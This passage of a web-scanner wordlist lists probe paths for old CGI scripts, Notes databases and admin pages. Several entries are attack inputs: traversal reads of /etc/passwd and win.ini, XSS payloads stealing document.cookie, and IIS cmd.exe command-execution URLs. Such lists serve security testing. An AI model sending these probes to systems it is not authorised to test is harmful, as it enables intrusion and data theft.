cgi-local/cgiemail-1.6/cgicso?query=AAA
cgi-shl/win-c-sample.exe
cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-sys/FormMail-clone.cgi
cgi-sys/addalink.cgi
cgi-sys/cgiecho
cgi-sys/cgiemail
cgi-sys/countedit
cgi-sys/domainredirect.cgi
cgi-sys/entropybanner.cgi
cgi-sys/entropysearch.cgi
cgi-sys/helpdesk.cgi
cgi-sys/mchat.cgi
cgi-sys/randhtml.cgi
cgi-sys/realhelpdesk.cgi
cgi-sys/realsignup.cgi
cgi-sys/scgiwrap
cgi-sys/signup.cgi
cgi-win/cgitest.exe
cgi-win/uploader.exe
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
cgi/cgiproc?
cgicso?query=<script>alert('Vulnerable')</script>
cgicso?query=<script>alert('XSS')</script>
cgicso?query=AAA
cgiforum.pl?thesection=../../../../../../../../../../etc
cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
cgimail.exe
cgis/wwwboard/wwwboard.cgi
cgis/wwwboard/wwwboard.pl
cgitest.exe
cgiwrap
cgiwrap/%3Cfont%20color=red%3E
cgiwrap/~@U
cgiwrap/~@USERS
cgiwrap/~JUNK(5)
cgiwrap/~root
change-your-password.pl
chassis/config/GeneralChassisConfig.html
chat/!nicks.txt
chat/!pwds.txt
chat/data/usr
chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
chat_dir/register.php
chatlog.nsf
checkout_payment.php
class/mysql.class
classified.cgi
classifieds
classifieds.cgi
classifieds/classifieds.cgi
classifieds/index.cgi
clbusy.nsf
cldbdir.nsf
cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><
cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
clickcount.pl?view=test
clickresponder.pl
client/
cliente/
clientes/
clients/
clocktower/
clusta4.nsf
clusterframe.jsp
clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
cm/
cmd.exe?/c+dir
cmd1.exe?/c+dir
code.php
code.php3
code/
collect4.nsf
com
com/
com/novell/
com/novell/gwmonitor/help/en/default.htm
com/novell/webaccess
com/novell/webaccess/help/en/default.htm
com/novell/webpublisher/help/en/default.htm
com5.........................…